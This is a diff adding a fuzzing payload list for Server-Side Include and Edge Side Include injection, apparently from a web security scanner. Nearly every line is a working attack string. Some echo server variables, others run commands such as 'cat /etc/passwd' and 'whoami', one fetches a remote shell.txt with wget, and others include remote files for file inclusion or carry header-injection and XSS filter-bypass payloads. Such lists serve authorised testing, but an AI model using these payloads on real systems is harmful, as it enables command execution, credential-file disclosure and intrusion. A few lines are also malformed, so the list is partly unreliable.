|
| 1 | +<!--#config errmsg="File not found, informs users and password"--> |
| 2 | +<!--#config timefmt="A %B %d %Y %r"--> |
| 3 | +<!--#echo var="DATE_LOCAL" --> |
| 4 | +<!--#echo var="DOCUMENT_NAME" --> |
| 5 | +<!--#echo var="DOCUMENT_URI" --> |
| 6 | +<!--#echo var="auth_type" --> |
| 7 | +<!--#echo var="content_length" --> |
| 8 | +<!--#echo var="content_type" --> |
| 9 | +<!--#echo var="date_gmt" --> |
| 10 | +<!--#echo var="date_local" --> |
| 11 | +<!--#echo var="document_name" --> |
| 12 | +<!--#echo var="document_root" --> |
| 13 | +<!--#echo var="document_uri" --> |
| 14 | +<!--#echo var="forwarded" --> |
| 15 | +<!--#echo var="from" --> |
| 16 | +<!--#echo var="gateway_interface" --> |
| 17 | +<!--#echo var="http_accept" --> |
| 18 | +<!--#echo var="http_accept_charset" --> |
| 19 | +<!--#echo var="http_accept_encoding" --> |
| 20 | +<!--#echo var="http_accept_language" --> |
| 21 | +<!--#echo var="http_client_ip" --> |
| 22 | +<!--#echo var="http_connection" --> |
| 23 | +<!--#echo var="http_cookie" --> |
| 24 | +<!--#echo var="http_form" --> |
| 25 | +<!--#echo var="http_host" --> |
| 26 | +<!--#echo var="http_referer" --> |
| 27 | +<!--#echo var="http_ua_cpu" --> |
| 28 | +<!--#echo var="http_ua_os" --> |
| 29 | +<!--#echo var="http_user_agent" --> |
| 30 | +<!--#echo var="last_modified" --> |
| 31 | +<!--#echo var="netsite_root" --> |
| 32 | +<!--#echo var="page_count" --> |
| 33 | +<!--#echo var="path" --> |
| 34 | +<!--#echo var="path_info" --> |
| 35 | +<!--#echo var="path_info_translated" --> |
| 36 | +<!--#echo var="path_translated" --> |
| 37 | +<!--#echo var="query_string" --> |
| 38 | +<!--#echo var="query_string_unescaped" --> |
| 39 | +<!--#echo var="remote_addr" --> |
| 40 | +<!--#echo var="remote_host" --> |
| 41 | +<!--#echo var="remote_ident" --> |
| 42 | +<!--#echo var="remote_port" --> |
| 43 | +<!--#echo var="remote_user" --> |
| 44 | +<!--#echo var="request_method" --> |
| 45 | +<!--#echo var="request_uri" --> |
| 46 | +<!--#echo var="script_filename" --> |
| 47 | +<!--#echo var="script_name" --> |
| 48 | +<!--#echo var="script_uri" --> |
| 49 | +<!--#echo var="script_url" --> |
| 50 | +<!--#echo var="server_addr" --> |
| 51 | +<!--#echo var="server_admin" --> |
| 52 | +<!--#echo var="server_name --> |
| 53 | +<!--#echo var="server_port" --> |
| 54 | +<!--#echo var="server_protocol" --> |
| 55 | +<!--#echo var="server_software" --> |
| 56 | +<!--#echo var="site_htmlroot" --> |
| 57 | +<!--#echo var="total_hits" --> |
| 58 | +<!--#echo var="tz" --> |
| 59 | +<!--#echo var="unique_id" --> |
| 60 | +<!--#echo var="user_name" --> |
| 61 | +<!--#exec cmd="/bin/ls /" --> |
| 62 | +<!--#exec cmd="cat /etc/passwd" --> |
| 63 | +<!--#exec cmd="cd C:\WINDOWS\System32"> |
| 64 | +<!--#exec cmd="curl http://sn1persecurity.com/.testing/rfi_vuln.php" --> |
| 65 | +<!--#exec cmd="dir" --> |
| 66 | +<!--#exec cmd="ipconfig" --> |
| 67 | +<!--#exec cmd="ls" --> |
| 68 | +<!--#exec cmd="perl -e 'print "X"*5000'" --> |
| 69 | +<!--#exec cmd="sleep 10" --> |
| 70 | +<!--#exec cmd="sleep 5" --> |
| 71 | +<!--#exec cmd="uname" --> |
| 72 | +<!--#exec cmd="wget http://website.com/dir/shell.txt" --> |
| 73 | +<!--#exec cmd="whoami" --> |
| 74 | +<!--#exec cmd="whoami"--> |
| 75 | +<!--#flastmod virtual="echo.html" --> |
| 76 | +<!--#fsize file="ssi.shtml" --> |
| 77 | +<!--#include file=?UUUUUUUU...UU?--> |
| 78 | +<!--#include virtual="/" --> |
| 79 | +<!--#include virtual="/index.html" --> |
| 80 | +<!--#include virtual="http://sn1persecurity.com/.testing/rfi_vuln.php" --> |
| 81 | +<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" --> |
| 82 | +<!--#printenv --> |
| 83 | +</nowiki> |
| 84 | +<esi:debug/> |
| 85 | +<esi:include src="http://google.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/> |
| 86 | +<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://google.com/poc.xsl" /> |
| 87 | +<esi:include src=http://google.com/> |
| 88 | +<pre><!--#echo var="DATE_LOCAL" --> </pre> |
| 89 | +<pre><!--#exec cmd="dir" --></pre> |
| 90 | +<pre><!--#exec cmd="ls" --></pre> |
| 91 | +<pre><!--#exec cmd="whoami"--></pre> |
| 92 | +x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> |
0 commit comments